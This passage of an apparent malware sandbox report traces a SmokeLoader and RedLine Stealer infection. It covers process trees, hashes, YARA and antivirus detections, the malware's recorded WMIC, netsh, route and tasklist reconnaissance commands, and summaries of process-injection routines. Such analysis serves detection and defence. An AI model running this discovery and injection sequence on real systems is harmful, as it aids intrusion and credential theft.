Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:27:23
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\haevsid
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\haevsid
Imagebase:	0x400000
File size:	384'512 bytes
MD5 hash:	43DA422957B397E2805362661AB3FD4A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970636946.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970849868.00000000040E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:28:15
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Local\Temp\38E5.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\38E5.exe
Imagebase:	0x400000
File size:	401'920 bytes
MD5 hash:	B39D75B20F14D8DFCB2325D7082CB2B9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2487345753.0000000000761000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2436031389.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2487198589.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:28:41
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\uievsid
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uievsid
Imagebase:	0x400000
File size:	401'920 bytes
MD5 hash:	B39D75B20F14D8DFCB2325D7082CB2B9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.2699654261.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2754187003.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:28:54
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Local\Temp\BC8F.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\BC8F.exe
Imagebase:	0x7ff6aab40000
File size:	78'336 bytes
MD5 hash:	69C7186C5393D5E94294E39DA1D4D830
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:28:55
Start date:	03/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff65bd10000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:28:58
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf10000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:28:59
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:29:00
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf10000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	06:29:01
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4137644244.0000000000111000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	06:29:02
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xf10000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	06:29:03
Start date:	03/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	06:29:13
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd
Imagebase:	0x7ff77fe60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	06:29:13
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	06:29:14
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:29:16
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:29:17
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:29:20
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:29:22
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:29:27
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	06:29:30
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:29:32
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	06:29:35
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	06:29:43
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	06:29:46
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	06:29:53
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	06:30:01
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\uievsid
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uievsid
Imagebase:	0x400000
File size:	401'920 bytes
MD5 hash:	B39D75B20F14D8DFCB2325D7082CB2B9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.4141842433.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000021.00000003.3713654761.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.4143586325.00000000006B2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	06:30:02
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\haevsid
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\haevsid
Imagebase:	0x400000
File size:	384'512 bytes
MD5 hash:	43DA422957B397E2805362661AB3FD4A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.3707478995.0000000002731000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.3707763574.00000000027CF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.3707006171.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.3707296343.0000000002710000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	06:30:06
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase:	0x7ff71e800000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	06:30:08
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase:	0x7ff7c1820000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	06:30:13
Start date:	03/10/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /displaydns
Imagebase:	0x7ff7759e0000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	06:30:14
Start date:	03/10/2024
Path:	C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):	false
Commandline:	route print
Imagebase:	0x7ff7dc2e0000
File size:	24'576 bytes
MD5 hash:	3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	06:30:15
Start date:	03/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall show state
Imagebase:	0x7ff7173e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	06:30:17
Start date:	03/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6087c0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	06:30:26
Start date:	03/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /v /fo csv
Imagebase:	0x7ff64b7b0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	40.7%
Signature Coverage:	44.9%
Total number of Nodes:	118
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1735903508.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_veEGy9FijY.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
